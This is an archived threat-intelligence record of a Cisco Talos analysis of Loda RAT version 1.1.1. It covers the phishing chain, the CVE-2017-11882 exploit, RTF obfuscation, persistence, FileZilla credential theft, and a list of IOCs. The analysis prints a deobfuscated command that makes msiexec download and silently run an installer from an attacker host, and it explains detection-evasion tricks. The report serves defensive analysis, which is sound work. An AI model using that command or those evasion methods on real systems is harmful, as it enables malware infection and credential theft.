{
	"id": "4b460c10-eadb-4115-a4e1-d6b3a7dc0672",
	"created_at": "2026-04-06T00:12:36.335785Z",
	"updated_at": "2026-04-10T13:12:45.241118Z",
	"deleted_at": null,
	"sha1_hash": "f7942b0715d59e9946dc54fdcf97b095e4cd449e",
	"title": "Loda RAT Grows Up",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1442300,
	"plain_text": "Loda RAT Grows Up\r\nBy Chris Neal\r\nPublished: 2020-02-12 · Archived: 2026-04-05 23:13:16 UTC\r\nWednesday, February 12, 2020 14:45\r\nBy Chris Neal.\r\nOver the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting\r\na new version of Loda, a remote access trojan (RAT) written in AutoIT.\r\nThese websites also host malicious documents that begin a multi-stage infection chain which ultimately\r\nserves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run\r\nthe MSI file, which contains Loda version 1.1.1.\r\nThis campaign appears to be targeting countries in South America and Central America, as well as the U.S.\r\nWhat's New?\r\nTalos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT\r\nscript changed to a different form of string encoding. Multiple persistence mechanisms have been employed to\r\nensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to\r\nenumerate antivirus solutions running on the infected host.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 1 of 10\n\nHow Did it Work?\r\nThe Loda sample analyzed in this post is delivered via a document chain. The first contains an OOXML\r\nrelationship to a second document that contains an exploit. Once the exploit is triggered, an MSI file that contains\r\nthe Loda RAT is downloaded to the target host and executed. While the main purpose of this RAT is to steal\r\nusernames, passwords, and cookies saved within browsers, it also has keylogging, sound recording, screenshotting\r\nand the ability to allow the threat actor to send messages to the infected host.\r\nSo What?\r\nLoda is a simple, yet effective, RAT that has matured over time. This RAT is a good example of how effective\r\nrelatively simple techniques combined with basic obfuscation can be. The techniques this malware employs are of\r\nfairly low complexity and show that slight changes in implementation can significantly reduce detection rates.\r\nThe Campaign\r\nTelemetry from Cisco Umbrella shows that this campaign is quite active and seems to be targeting countries in\r\nSouth America, Central America and the U.S. The majority of the queries to the C2 domain\r\n\"4success[.]zapto[.]org\" originate from Brazil, Costa Rica and the United States. Similarly, the queries to\r\n\"success20[.]hopto[.]org\" originate from Argentina, Brazil and the United States. Our telemetry also shows that\r\nC2 communications go as far back as the last quarter of 2019.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 2 of 10\n\nDNS queries to 4success[.]zapto[.]org\r\nInfection chain\r\nAt the time of analysis, several steps of the infection chain had a relatively low detection rate due to various\r\nobfuscation techniques. The initial document is delivered via a phishing email that contains the first-stage\r\ndocument as an attachment.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 3 of 10\n\nExample of an email from this campaign\r\nThe first document in the infection chain, titled in one instance \"comprobante de confirmación de pago.docx\"\r\ncontains an OOXML relationship, located in \"/word/_rels\" that points to a second document at\r\n\"http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc\". Aside from this OOXML relationship, the initial\r\ndocument isn't particularly noteworthy. The document uses this two-stage document technique to bypass some\r\nemail filters.\r\nOOXML Relationship\r\nThe second document is a Rich Text Format document that contains a payload within an obfuscated OLE object\r\nwhich is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions\r\nof Microsoft Office. The contents of the Author field, \"obidah qudah\" in the metadata of this document appears to\r\nbe constant across all samples analyzed during the investigation.\r\nWhen we looked deeper into this author's name, we discovered they have a relatively long history of being\r\nassociated with malicious RTF documents. Starting in 2017, there have been just under 1,300 malicious\r\ndocuments submitted to VirusTotal that contain \"obidah qudah\" in the author field. An overwhelming majority of\r\nthese submissions are RTF documents that exploit CVE-2017-11882.\r\nHowever, the \"Last Modified By\" field is not static throughout these documents. There appear to be multiple\r\ncampaigns over the last few years, starting in 2017, that use the \"obidah qudah\" author name, with each campaign\r\nusing a different \"Last Modified By\" field, with many serving malware other than Loda. It is unclear whether\r\nthese campaigns were initiated by the same threat actor, or if a single malicious RTF document builder was used\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 4 of 10\n\nby multiple different actors. In the documents analyzed in this post, the \"Last Modified By\" value is set to\r\n\"Richard.\"\r\nAuthor labeled as \"obidah qudah\"\r\nThe OLE object within this document that contains the exploit and payload employs an interesting obfuscation\r\ntechnique that utilizes RTF control words.\r\nObfuscated payload\r\nThe control word \"\\par\" used in the object indicates the end of a paragraph, while the \"\\*\" has a slightly more\r\ncomplex function. The \"\\*\" control word instructs an RTF reader to ignore the following control words only if\r\nthey are not understood by the reader, which allows the author to include false control words (ex: \\par67234).\r\nUsing this technique to break up the OLE object not only obfuscates the payload but also does not allow RTF\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 5 of 10\n\nparsers to read the object in its entirety. Once it is executed, the control words will be ignored, concatenating the\r\nbytes in between into the exploit payload as shown below.\r\nDeobfuscated payload\r\nWithin this payload, the command \"cmd.exe \u0026 /C CD C: \u0026 msiexec.exe /i\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet\" can be seen. Once the exploit is triggered, a\r\nmalicious MSI file is then downloaded and executed.\r\nThis MSI was created using Exe2Msi, a common tool used to repackage Windows executables as an MSI file.\r\nAlthough this tool is most often used with legitimate software, it is also frequently used by malware authors. One\r\nof the benefits of delivering malware in an MSI package is that it provides a lower detection rate. Simply\r\nrepackaging a malicious executable as an MSI file can reduce detection rates with very little effort. If repackaged\r\nas an MSI, the detection rate of a malicious executable can drop by up to 50 percent on VirusTotal. Combined\r\nwith other forms of obfuscation, this can result in a crude, yet effective, means of evasion.\r\nThe malware\r\nAt execution, \"fkrkdn.msi\" extracts an executable at \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Windata\\JLMWFF.exe.\" This is the Loda 1.1.1 binary, which is a compiled AutoIT\r\nscript. A detailed write-up by Proofpoint on a previous version of Loda and its functionality can be found here.\r\nThe initial C2 beacon was captured from \"JLMWFF.exe\" which contained the unique signature \"ZeXro0\" repeated\r\nseveral times, which is not present in other versions of Loda. The C2 comms pointed to \"4success[.]zapto[.]org\"\r\ncontain information about the infected host, including OS version, architecture and username. This also reveals\r\nthat this version of Loda is \"1.1.1.\" Aside from the unique signature, this beacon format is the same as previous\r\nversions.\r\nEven though this new version of Loda has nearly identical functionality as previous versions, there are significant\r\ndifferences in implementation and design. Some of the functions within the script have been completely rewritten,\r\nwith the most readily apparent change being the obfuscation technique used. In version 1.1.1, almost every string\r\nor variable is obfuscated using the simple encoding algorithm shown below.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 6 of 10\n\nLoda's encoding algorithm\r\nThere are a few key changes in functionality in version 1.1.1. To detect what antivirus software is running on the\r\nhost, earlier versions of Loda would call the AutoIT function PROCESSEXISTS() for each antivirus software\r\nprocess name. Loda 1.1.1 now makes a WMI query to \"winmgmts:\\\\localhost\\root\\SecurityCenter2\" to enumerate\r\ninstalled antivirus solutions, as shown below in the deobfuscated code:\r\nAV enumeration function\r\nFor persistence, the new version now adds both a registry key and a scheduled task:\r\nPersistence mechanism\r\nA new capability this version has is the ability to read the contents of \"\\filezilla\\recentservers.xml\". This document\r\ncontains the IP addresses, usernames and passwords of servers that Filezilla has recently connected to. It is\r\nimportant to note that these passwords are stored in either plaintext or encoded in base64.\r\nOne interesting functionality that persists through the versions of Loda is the command \"QURAN\". This\r\ncommand streams music from \"live.mp3quran[.]net:9976\" in Windows Media Player using the Microsoft Media\r\nServer (MMS) protocol. MMS is a deprecated Microsoft proprietary network streaming protocol used to stream\r\nmedia in Windows Media Player.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 7 of 10\n\n\"QURAN\" command function\r\nThere is no other functionality to this command other than playing the music that is streaming at this URL to the\r\ninfected host.\r\nConclusion\r\nAlthough the functionality of this new version of Loda is similar to previous versions, this new iteration is a\r\nslightly more well-developed RAT. Loda is simple yet has proven to be effective, and poses a serious threat to an\r\ninfected host. The credential stealing capabilities could lead to significant financial loss or a potential data breach.\r\nBy changing the obfuscation techniques the threat actor was able to lower the detection rate considerably. The\r\nchange in persistence mechanisms and AV solution detection show that the malware authors are actively\r\nimproving the functionality of Loda.\r\nCoverage\r\nSnort [SID] 53031\r\nClamAV\r\nWin.Packed.LokiBot-6963314-0\r\nDoc.Exploit.Cve_2017_11882-7570663-1\r\nDoc.Downloader.Loda-7570590-0\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 8 of 10\n\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), andMeraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs:\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/kctlqz.msi\r\nhttp://drinkfoodapp[.]com/AdminDF/assets/img/app/settings.doc\r\nhttp://drinkfoodapp.com/AdminDF/assets/img/app/grcfne.msi\r\nhttp://yewonder[.]com/wp-content/plugins/ltfhmam/eklnxx.msi\r\nhttps://www[.]miracleworkstudios[.]com/wp-content/uploads/2019/12/app/updates.doc\r\nhttp://wp[.]168gamer[.]com/secured/mcsonb.msi\r\nhttp://wp[.]168gamer[.]com/secured/office.doc\r\nDocs:\r\nb5df816986a73e890f41ff0c0470a2208df523f17eb4eac9c5f0546da2ec161e\r\naf42191fe2ea328080939ec656302a8f364dac44b5cd8277dcbaeb15ff499178\r\n36865059f1c142ba1846591aae8d78d8a109a0dc327a88547e41e3663bad2eaf\r\ne15336491ab57a16a870edd5b135014b62387cb45e4e490b9d4091c54394dec4\r\nMSI:\r\n9edd2bfdb0c177f046cec1392d31ee3f67174e0a23fdf7e4b6fd580e769f0493\r\n8b989db4a9f8c3f0fa825cca35386ac4be4e33fd2ea53a118d4f4dd8259aeccc\r\n633f3970c31c9cb849bd5f66c3a783538bb2327b4bec5774b870f8b3b53ea3c1\r\nC65668958c5dfeccb40abd0771c17d045f24c78f51ea6c3955e110f53ad8eece\r\n740a5c19645d5a90fc1e11c84f5d6a058dc50206337aa37bbc783bd54ba84a79\r\n6cb47f2ecd58349ffe65d7ea281eea2ebd231bbaac30843f872ae2249bd140b0\r\nC2:\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 9 of 10\n\n4success[.]zapto[.]org\r\nsuccess20[.]hopto[.]org\r\nbreakthrough[.]hopto[.]org\r\nSource: https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html"
	],
	"report_names": [
		"loda-rat-grows-up.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434356,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.pdf",
		"text": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.txt",
		"img": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.jpg"
	}
}